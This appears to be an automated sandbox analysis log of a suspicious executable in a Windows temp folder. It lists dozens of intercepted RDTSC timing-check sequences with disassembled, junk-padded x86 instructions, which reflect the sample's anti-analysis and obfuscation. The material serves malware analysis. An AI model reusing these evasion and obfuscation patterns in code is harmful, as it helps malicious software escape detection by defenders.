Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0441 second address: 52E0447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0447 second address: 52E044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E044C second address: 52E0462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 6249E01Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and dword ptr [eax+04h], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0462 second address: 52E0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0479 second address: 52E04A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov esi, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d call 00007FEE84E88FD3h 0x00000012 mov di, ax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 mov edi, 46F70356h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C06DF second address: 52C071D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEE851EFD97h 0x00000008 pop ecx 0x00000009 jmp 00007FEE851EFD99h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C071D second address: 52C0721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0721 second address: 52C0734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0734 second address: 52C076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEE84E88FD8h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C076F second address: 52C077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D0FB8 second address: 52D0FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E01EA second address: 52E0204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 23C26A22h 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov edi, ecx 0x00000011 mov cl, 7Ah 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0204 second address: 52E0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300660 second address: 5300686 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 2C5BC4C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE851EFD99h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300686 second address: 53006BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx eax, bx 0x0000000f mov bh, 85h 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 jmp 00007FEE84E88FD0h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006BC second address: 53006C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006C0 second address: 53006DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006DC second address: 53006E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006E2 second address: 53006E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53006E6 second address: 530075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a jmp 00007FEE851EFD8Fh 0x0000000f mov di, ax 0x00000012 popad 0x00000013 mov eax, dword ptr [76FA65FCh] 0x00000018 pushad 0x00000019 mov ecx, 51E6A537h 0x0000001e call 00007FEE851EFD8Ch 0x00000023 pop edi 0x00000024 popad 0x00000025 test eax, eax 0x00000027 pushad 0x00000028 call 00007FEE851EFD8Ah 0x0000002d movzx ecx, bx 0x00000030 pop edi 0x00000031 mov esi, 3F8F41B3h 0x00000036 popad 0x00000037 je 00007FEEF6E12FB9h 0x0000003d pushad 0x0000003e mov cx, 342Bh 0x00000042 call 00007FEE851EFD90h 0x00000047 mov edi, ecx 0x00000049 pop ecx 0x0000004a popad 0x0000004b mov ecx, eax 0x0000004d pushad 0x0000004e push edx 0x0000004f mov di, cx 0x00000052 pop eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 pop eax 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 530075E second address: 5300798 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEE84E88FCDh 0x00000008 jmp 00007FEE84E88FCBh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xor eax, dword ptr [ebp+08h] 0x00000014 jmp 00007FEE84E88FCFh 0x00000019 and ecx, 1Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300798 second address: 530079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 530079E second address: 53007A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53007A4 second address: 53007A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53007A8 second address: 5300801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d jmp 00007FEE84E88FD0h 0x00000012 leave 0x00000013 pushad 0x00000014 mov edi, ecx 0x00000016 pushfd 0x00000017 jmp 00007FEE84E88FCAh 0x0000001c xor eax, 309C2538h 0x00000022 jmp 00007FEE84E88FCBh 0x00000027 popfd 0x00000028 popad 0x00000029 retn 0004h 0x0000002c nop 0x0000002d mov esi, eax 0x0000002f lea eax, dword ptr [ebp-08h] 0x00000032 xor esi, dword ptr [00732014h] 0x00000038 push eax 0x00000039 push eax 0x0000003a push eax 0x0000003b lea eax, dword ptr [ebp-10h] 0x0000003e push eax 0x0000003f call 00007FEE89A997EFh 0x00000044 push FFFFFFFEh 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300801 second address: 5300807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300807 second address: 5300824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FD9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300824 second address: 5300863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007FEE851EFD8Eh 0x00000011 ret 0x00000012 nop 0x00000013 push eax 0x00000014 call 00007FEE89E005FAh 0x00000019 mov edi, edi 0x0000001b jmp 00007FEE851EFD90h 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300863 second address: 5300867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300867 second address: 53008C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, si 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FEE851EFD95h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov eax, 5E95F493h 0x00000017 movzx esi, di 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bx, ax 0x00000023 pushfd 0x00000024 jmp 00007FEE851EFD98h 0x00000029 sbb cx, 4848h 0x0000002e jmp 00007FEE851EFD8Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0072 second address: 52B00E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c mov di, 1E76h 0x00000010 pop edx 0x00000011 mov dx, cx 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FEE84E88FD4h 0x0000001e and si, 9398h 0x00000023 jmp 00007FEE84E88FCBh 0x00000028 popfd 0x00000029 mov cx, 054Fh 0x0000002d popad 0x0000002e and esp, FFFFFFF8h 0x00000031 jmp 00007FEE84E88FD2h 0x00000036 xchg eax, ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00E3 second address: 52B00E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00E7 second address: 52B00ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00ED second address: 52B00F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00F3 second address: 52B00F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B00F7 second address: 52B0111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0111 second address: 52B011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 91E9h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B011A second address: 52B013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 1Bh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE851EFD95h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B013C second address: 52B0151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0151 second address: 52B0157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0157 second address: 52B015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B015B second address: 52B0206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 mov cx, 5E8Dh 0x00000014 popad 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007FEE851EFD99h 0x0000001c sbb cx, A816h 0x00000021 jmp 00007FEE851EFD91h 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007FEE851EFD8Eh 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 mov ebx, esi 0x00000033 pushad 0x00000034 call 00007FEE851EFD8Fh 0x00000039 pop esi 0x0000003a popad 0x0000003b popad 0x0000003c mov ebx, dword ptr [ebp+10h] 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FEE851EFD90h 0x00000048 xor eax, 3BB665C8h 0x0000004e jmp 00007FEE851EFD8Bh 0x00000053 popfd 0x00000054 mov si, 6F3Fh 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0206 second address: 52B020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B020C second address: 52B02C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007FEE851EFD94h 0x00000012 movzx ecx, dx 0x00000015 pop edx 0x00000016 movzx ecx, dx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c call 00007FEE851EFD94h 0x00000021 movzx eax, di 0x00000024 pop ebx 0x00000025 mov cx, 0B83h 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FEE851EFD94h 0x00000032 sub cx, 8F48h 0x00000037 jmp 00007FEE851EFD8Bh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FEE851EFD98h 0x00000043 add si, 51A8h 0x00000048 jmp 00007FEE851EFD8Bh 0x0000004d popfd 0x0000004e popad 0x0000004f mov esi, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02C2 second address: 52B02C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02C6 second address: 52B02CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02CA second address: 52B02D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02D0 second address: 52B02E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02E5 second address: 52B02E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B02E9 second address: 52B0306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0306 second address: 52B030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B030C second address: 52B0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0310 second address: 52B0336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edi 0x0000000e jmp 00007FEE84E88FD7h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0336 second address: 52B03CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE851EFD8Fh 0x00000009 jmp 00007FEE851EFD93h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FEE851EFD98h 0x00000015 adc si, 6D88h 0x0000001a jmp 00007FEE851EFD8Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, edi 0x00000024 pushad 0x00000025 mov eax, 68103F1Bh 0x0000002a jmp 00007FEE851EFD90h 0x0000002f popad 0x00000030 test esi, esi 0x00000032 jmp 00007FEE851EFD90h 0x00000037 je 00007FEEF6E5DFE7h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 call 00007FEE851EFD8Ch 0x00000045 pop esi 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03CA second address: 52B03ED instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, 2664AC92h 0x0000000c popad 0x0000000d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FEE84E88FCBh 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03ED second address: 52B03F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03F1 second address: 52B03F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03F7 second address: 52B03FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B03FD second address: 52B0401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0401 second address: 52B0405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0405 second address: 52B047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEEF6AF71E4h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FEE84E88FD8h 0x00000015 or ecx, 3D811708h 0x0000001b jmp 00007FEE84E88FCBh 0x00000020 popfd 0x00000021 call 00007FEE84E88FD8h 0x00000026 movzx eax, bx 0x00000029 pop edi 0x0000002a popad 0x0000002b mov edx, dword ptr [esi+44h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FEE84E88FD9h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B047A second address: 52B04F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEE851EFD93h 0x00000009 and ecx, 2817B20Eh 0x0000000f jmp 00007FEE851EFD99h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007FEE851EFD8Eh 0x00000020 test edx, 61000000h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ch, bh 0x0000002b pushfd 0x0000002c jmp 00007FEE851EFD96h 0x00000031 add al, FFFFFFE8h 0x00000034 jmp 00007FEE851EFD8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B04F7 second address: 52B054F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEEF6AF713Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007FEE84E88FCFh 0x0000001a adc si, 478Eh 0x0000001f jmp 00007FEE84E88FD9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A089F second address: 52A093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FEE851EFD8Eh 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FEE851EFD90h 0x00000012 mov ebp, esp 0x00000014 jmp 00007FEE851EFD90h 0x00000019 and esp, FFFFFFF8h 0x0000001c jmp 00007FEE851EFD90h 0x00000021 xchg eax, ebx 0x00000022 jmp 00007FEE851EFD90h 0x00000027 push eax 0x00000028 pushad 0x00000029 call 00007FEE851EFD91h 0x0000002e mov ch, 17h 0x00000030 pop ebx 0x00000031 mov bh, ch 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 jmp 00007FEE851EFD95h 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FEE851EFD8Dh 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A093A second address: 52A0940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0940 second address: 52A094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A094F second address: 52A0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0953 second address: 52A096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
